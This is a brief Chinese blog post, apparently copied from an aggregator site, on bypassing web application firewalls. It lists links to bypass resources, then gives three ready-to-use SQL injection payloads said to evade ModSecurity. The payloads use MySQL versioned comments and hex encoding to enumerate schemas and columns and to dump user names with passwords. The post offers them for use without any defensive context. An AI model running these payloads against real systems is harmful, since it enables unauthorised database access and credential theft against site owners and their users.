waf绕过技巧
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了waf绕过技巧相关的知识,希望对你有一定的参考价值。
0x00 links
waf绕过技巧库:
http://wafbypass.me/w/index.php/Main_Page may be a best one
https://xianzhi.aliyun.com/forum/attachment/big_size/wafbypass_sql.pdf good
http://www.freebuf.com/articles/web/10099.html WAF绕过的奇技淫巧
http://tech-technical.com/index.php/2015/11/11/waf-bypass-sql-injection-tutorial/ 老外的技巧
http://webvuln.blogspot.hk/2015_04_01_archive.html 测试fuzz
http://www.wooyun.org/bugs/wooyun-2014-089426 good
https://forum.90sec.org/forum.php?mod=viewthread&tid=9133 90sec新思路
http://www.idiot-attacker.com/2016/02/macam-macam-kode-bypass-waf.html good
http://wooyun.org/bugs/wooyun-2010-0121291
http://wooyun.org/bugs/wooyun-2010-0115175 fuzz2bypass
http://drops.wooyun.org/tips/7883
http://www.securityidiots.com/Web-Pentest/WAF-Bypass/
http://www.pentest.net.cn/post/7
http://www.mottoin.com/86886.html
http://mp.weixin.qq.com/s?__biz=MzIyNjQzMjcyNw==&mid=2247483860&idx=1&sn=fa19f02e29d25f5f6852af27451ae4a9&scene=23&srcid=0815JYA53l0Bk3PMkhzRlKUh#rd
0x01 bypassed
1>modsecurity
id=-29 /*!30000union select 1,2,group_concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e),version(),5,6,7,8 from `information_schema`.schemata*/--
id=-29 /*!30000union select 1,2,group_concat(0x7e,0x27,unhex(Hex(cast(column_name as char))),0x27,0x7e),version(),5,6,7,8 from `information_schema`.columns where table_name=0x75736572*/--
id=-29 /*!30000union select 1,2,group_concat(0x7e,0x27,unhex(Hex(cast(name as char))),0x3a,unhex(Hex(cast(password as char))),0x27,0x7e),version(),5,6,7,8 from user*/--
以上是关于waf绕过技巧的主要内容,如果未能解决你的问题,请参考以下文章